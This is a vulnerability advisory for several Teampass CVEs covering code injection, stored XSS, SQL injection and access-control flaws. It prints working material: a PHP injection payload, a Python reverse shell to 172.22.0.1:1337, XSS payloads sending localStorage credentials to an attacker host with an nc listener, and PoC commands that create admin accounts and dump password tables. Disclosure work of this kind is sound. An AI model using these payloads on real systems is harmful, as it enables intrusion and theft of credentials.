CVE-2024-53510 - Sensitive (user/password) data stored in Cleartext in Database

CVSS	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N - 4.1 (Medium)
CWE	CWE-256: Plaintext Storage of a Password CWE-312: Cleartext Storage of Sensitive Information

Description

When an account is created on the application, a sixteen-character password is generated and sent in cleartext by e-mail to the address used to generate the account.

These actions are logged in the database (in the teampass_background_tasks table), along with the contents of the email containing the plaintext password.

Thus, by knowing the e-mail pattern and exploiting a potential vulnerability that allows the database to be read (such as SQL injection, it is possible to recover potential passwords in clear text.

Impact

If the database is compromised, the secrets stored in clear text offer no security and enable an attacker to gain direct access, including to administration accounts.

Remediation

Upgrade Teampass in the new version.

CVE-2024-53511 - Remote Code Injection via tp.config.php

CVSS	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - 7.2 (High)
CWE	CWE-94: Improper Control of Generation of Code ('Code Injection')

Description

Administrators can modify numerous configuration options in the application's administration interface. These values are then integrated without sanitization into a PHP file, named tp.config.php and located in the /includes/config directory. The fact that the values are integrated directly into the file enables PHP code injection and, consequently, server code execution. An example is when creating a backup. It is then necessary to specify an encryption key.

In the configuration file, this option then appears in several fields.

The idea here is that it will be possible to close the string in the file, add code to execute commands on the server and make the PHP code work.

NOTE : It should be noted that if the PHP code is malformed, particularly with a simple quote, the application will no longer be accessible until the configuration file is manually modified, thus causing a denial of service.

This can be achieved by injecting the following payload into the fields:

AKAI'.system($_GET['cmd']).'LABS

From the code's point of view, this will look like this:

'bck_script_passkey' => 'AKAI'.system($_GET['cmd']).'LABS'

This code is then perfectly functional. By accessing the impacted file via the browser, it is then possible to trigger a command execution on the server: /includes/config/tp.config.php?cmd=[Bash Command]

http://172.22.0.3/includes/config/tp.config.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22172.22.0.1%22%2C1337%29%29%3Bsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%2Cstdin%3Ds.fileno%28%29%2Cstdout%3Ds.fileno%28%29%2Cstderr%3Ds.fileno%28%29%29%27

Impact

The ability to execute server-side code can result in a total loss of integrity, availability, and confidentiality within the application. An attacker may also abuse a code injection vulnerability to execute terminal commands on that server and pivot to adjacent systems.

Remediation

Upgrade Teampass in the new version.

CVE-2024-53512 - Broken Access Control - Admin User Creation (Privesc)

CVSS	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - 8.8 (High)
CWE	CWE-284: Improper Access Control CWE-285: Improper Authorization

Description

Users with restricted privileges can create users on the application, and grant them privileges such as administrative rights.

As shown, the user akai2 is not an administrator, but will be used for the demonstration.

If a user makes an add_new_user request on the /sources/users.queries.php endpoint, it will be possible to create a new user by specifying the following information:

{
    "login": "bacadduser",
    "name": "bac",
    "lastname": "adduser",
    "email": "bacadduser@akai.labs",
    "admin": 1,
    "manager": false,
    "hr": false,
    "read_only": false,
    "personal_folder": false,
    "new_folder_role_domain": false,
    "domain": "",
    "isAdministratedByRole": "0",
    "groups": ["1"],
    "allowed_flds": [],
    "forbidden_flds": [],
    "action_on_user": "update",
    "form-create-root-folder": false,
    "mfa_enabled": false
}

By specifying the value 1 in the admin field rather than true, this allows to bypass a filter preventing account creation.

The following command makes it easier to exploit the vulnerability, using the script developed for this purpose:

python3 teampass_poc.py request --uri '/sources/users.queries.php' --data '{"login": "bacadduser","name": "bac","lastname": "adduser","email": "bacadduser@akai.labs","admin": 1,"manager": false,"hr": false,"read_only": false,"personal_folder": false,"new_folder_role_domain": false,"domain": "","isAdministratedByRole": "0","groups": ["1"],"allowed_flds": [],"forbidden_flds": [],"action_on_user": "","form-create-root-folder": false,"mfa_enabled": false}' --key "<encryption key or cookie>" --type 'add_new_user' <target>

# OR

python3 teampass_poc.py exploit BACAddUser --key "[encryption key or cookie]" --login bacadduser --firstname bac --lastname adduser --email bacadduser@akai.labs --admin [target]

In terms of code, the fact that the password can be specified when the account is created is commented on. Instead, the application generates a random sixteen-character password and sends it by e-mail. This can also be seen in the database.

It is therefore possible to obtain the password in cleartext by providing a valid e-mail address controlled by the attacker. In this way, it is possible to obtain an administrator account on the application.

Impact

A low-privilege user can create accounts on the application and grant them administrative rights.

Remediation

Upgrade Teampass in the new version.

CVE-2024-48262 - Broken Access Control - Arbitrary User Disabling

CVSS	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H - 8.5 (High)
CWE	CWE-284: Improper Access Control CWE-285: Improper Authorization

Description

It has been found that a user with minimal privileges on the application can arbitrarily disable an account.

In the following example, the akai2 account has only User privileges. A second account named todisable is administrator. The latter will be the target account for the attack.

By querying the endpoint /sources/users.queries.php, all it takes is to specify the identifier of the user to be disabled, as well as a parameter (disabled_status) to define whether the target user should be disabled or enabled.

The JSON will take the following form:

{
    "user_id": 10000021,
    "disabled_status": 1
}

Here, the user_id field corresponds to the identifier of the target account. If the disabled_status field is set to 1, the account will be disabled, and if it is set to 0, the account will be enabled.

Using the developed script, the following command can be executed:

python3 teampass_poc.py request --uri "/sources/users.queries.php" --data '{"user_id": <target user id>,"disabled_status": 1}' --key "<encryption key or cookie>" --type "manage_user_disable_status" <target>

# OR

python3 teampass_poc.py exploit BACDisableUser --key "<encryption key or cookie>" --userid <target user id> --disable http://172.22.0.3

Impact

A low-privilege attacker could compromise the application's availability by iterating over the different identifiers and disabling all application accounts in order to generate a denial of service.

Remediation

Upgrade Teampass in the new version.

CVE-2024-48265 - Stored Cross-Site Scripting (XSS)

CVSS	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L - 9.1 (Critical)
CWE	CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Description

It has been found that it is possible to inject HTML code into file names that users can create if they have the right to do so. These vulnerabilities are exploitable by users with low privileges, and can be triggered by administrators to retrieve their cookie (which also acts as an encryption key for requests made to the server), as well as the browser's local storage containing a large amount of sensitive information such as the account's plain-text password.

Injection is possible despite client-side filtering. In fact, this filtering removes any HTML tags found in folder names when they are created. Furthermore, the parameters present in requests to the server are encrypted, making them difficult to modify. However, all the information is available to create the parameters in clear, encrypt them and send them to the server. The AES encryption algorithms can be found in the /includes/libraries/teampassclasses/encryption/src/Encryption.php file.

Execution in the "label" field of the folder

When a folder is created, its name is sent to the server in a parameter named title. A first injection is possible in this parameter and will be executed when the folder is consulted in the administration panel.

Following payload allows you to escape the double quote of the HTML input field containing the folder name and inject HTML code.

Payload :

Test Folder 123" onfocus="alert(localStorage.getItem(`teampassUser`))" autofocus="

Here, the HTML code is valid. As soon as the field is displayed, the Javascript code contained in the onfocus parameter will be automatically launched and all the information from the teampassUser field in the browser's local storage will be transmitted to the attacker's machine.

Here, information sent from the victim's browser is retrieved and parsed via the following bash command:

nc -lvp 1337 | head -1 | awk '{ sub(/.*exfil=/, ""); sub(/ HTTP.*/, ""); print}' |base64 -d

Note : It should be noted that the target here is the browser's local storage, which is not protected against this type of attack. However, in this case, it contains highly sensitive information such as the victim user's login, password in clear text and session cookie (contained in the key field). A low-privileged user could target an administrator and retrieve their credentials in order to impersonate them.

Using the script developed for this purpose, the code can be injected with the following command:

python3 teampass_poc.py exploit XSSOnOpening --key <KEY/COOKIE> --code 'var i=new Image(); i.src=`http://172.22.0.1:1337/?exfil=`+btoa(localStorage.getItem(`teampassUser`));' <target>

Execution on folder deletion

The second possibility is to trigger execution of the payload when the folder is deleted. Indeed, with the following payload injected, once again, into the folder name and if the user checks the checkbox and clicks on the Delete button, this will trigger the payload.

Payload :

Test Folder 456 <IMG src=x onerror="var i=new Image(); i.src=`http://172.22.0.1:1337/?exfil=`+btoa(localStorage.getItem(`teampassUser`));">

As it can be seen, all the information is once again retrieved, including the user's plaintext password (here the administrator account named admin), login and session cookie (in the key field).

Using the developed script, it is possible to inject the code via the following command:

python3 teampass_poc.py request --uri '/sources/folders.queries.php'  --data '{"title": "Test Folder 456 <IMG src=x onerror="var i=new Image(); i.src=`http://172.22.0.1:1337/?exfil=`+btoa(localStorage.getItem(`teampassUser`));">","parentId": "1","complexity": "0","icon": "","iconSelected": "","id": 1}' --key "[encryption key or cookie]" --type "add_folder" [target]

# OR

python3 teampass_poc.py exploit XSSOnDeletion --key [KEY/COOKIE] --code 'var i=new Image(); i.src=`http://172.22.0.1:1337/?exfil=`+btoa(localStorage.getItem(`teampassUser`));' [target]

Impact

In the present case, this vulnerability can be exploited by a low-privilege user, targeting administrator accounts. He can then attempt to retrieve sensitive information such as cookies, or by forcing a redirect to a malicious site. In the context of the application, the browser's local storage contains a lot of sensitive information (such as the account's plaintext password) and is by definition unprotected against this type of attack. If the exploit is successful, an attacker can then easily gain administrator access on the application.

Remediation

Upgrade Teampass in the new version.

CVE-2024-48266 - Password in Cleartext on Client Side (local storage browser)

CVSS	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - 6.5 (Medium)
CWE	CWE-922: Insecure Storage of Sensitive Information CWE-312: Cleartext Storage of Sensitive Information CWE-256: Plaintext Storage of a Password

Description

For application user accounts, new encryption keys can be generated via the context menu, by clicking on the user's name.

A window appears asking for confirmation that the user's password is correct. However, the plaintext password is already present in the field. This means that the password is not hashed and is probably stored on the client side.

In fact, by looking at the browser's local storage, several pieces of information are present, including the account's plain-text password. It's important to remember that local storage offers no security against attacks targeting the client.

Impact

The fact that the password is stored in clear text on the client side can enable an attacker to recover a user's authentication information in order to impersonate him or her. In addition, local storage is not protected against client-side attacks. This means that a successful attack could recover sensitive information in cleartext.

Remediation

Upgrade Teampass in the new version.

CVE-2024-48269 - SQL Injection (Pre-Authentication)

CVSS	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L - 9.9 (Critical)
CWE	CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Description

A SQL injection has been detected on the API. This injection occurs on the endpoint used to authenticate users on the API (/api/index.php/authorize). It turns out that at code level, two vulnerable queries are used to authenticate users. These SQL queries are performed in the getUserAuth function of the /api/Model/AuthModel.php file.

The first is as follows.

As it can be seen, a concatenation is performed in the PHP code with one of the parameters (login) controlled by the user. However, it remains difficult to exploit, as the anti XSS filters applied to user input do not allow the request to be manipulated in order to add code later.

However, a second request may allow controlled injection.

In this case, two parameters are concatenated with the request. The first is the API key (apikey) and the second is once again the login. As shown by the condition preceding the request, it is necessary to include the password parameter but to ensure that it is empty in order to carry out the request.

To exploit this vulnerability and bypass the filters in place, it is possible to supply a value ending in a backslash in the apikey parameter. In this way, the next quote will be ignored, and the rest of the query will be treated as a character string up to the second quote. Simply place the SQL code to be executed in the login parameter to reproduce a valid query.

Note : a comment is added at the end of the query to escape the last quote.

SELECT * FROM prefix_api WHERE value='' AND label=' <injected SQL code>-- -'

If the request is valid, the server will return a 401 error. Otherwise, it will return a 500 error.

Since it is not possible to obtain the result directly from the server, a Time Based attack can be carried out to retrieve the information contained in the database. The goal is to use the server's response time in the case of a valid or invalid condition.

Using the exploitation script, it is possible to run the following command to retrieve the logins/passwords contained in the database.

python3 teampass_poc.py exploit SQLInjection --prefix "teampass_" dump_table --table teampass_users --columns "login,pw" [target]

In the previous example, the terminal on the left corresponds to a mariadb shell. The terminal on the right corresponds to the exploitation of the vulnerability.

Impact

SQL injection can do a number of things. Controlling the queries sent to the database makes it possible to retrieve its contents. Thus, it may be possible to retrieve stored secrets. However, depending on the user's privileges, it may also be possible to write/read files arbitrarily, or even execute commands.

Remediation

Upgrade Teampass in the new version.

CVE-2024-48268 - Broken Access Control - Log Injection

CVSS	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N - 4.3 (Medium)
CWE	CWE-284: Improper Access Control CWE-285: Improper Authorization CWE-532: Insertion of Sensitive Information into Log File

Description

It was found that a user of the application, even with low privileges, was able to inject false logs into the application.

This vulnerability results from weak access control, allowing users to perform actions they are not supposed to be able to.

Indeed, the following screenshot shows the log list that was emptied for the demonstration.

By querying the endpoint /sources/items.logs.php and supplying the following JSON, a log will be created in the administration interface.

{
    "id": 1,
    "label": "testtest",
    "user_id": "1",
    "action": "at_creation",
    "login": "admin"
}

Here, it is important to note that in the payload sent to the server, it is specified that the user with ID 1 (here the admin account) would have created a folder. In the following example, the operation is carried out with a simple user, using a script to supply the payload in clear text.

python3 teampass_poc.py request --uri "/sources/items.logs.php" --data '{"id": 1,"label": "testtest","user_id": "1","action": "at_creation","login": "admin"}' --key "<encryption key or cookie>" --type "log_action_on_item" <target>

# OR

python3 teampass_poc.py exploit BACLogInjection --key "<encryption key or cookie>" --login "admin" --user_id "1" --folder_id "1" --label "testtest" <target>

As it can be seen in the administration interface, the log is created as the user admin, even though he never performed this action.

Impact

An attacker with low privilege can inject false logs into the application and visible into the administration interface.

Remediation

Upgrade Teampass in the new version.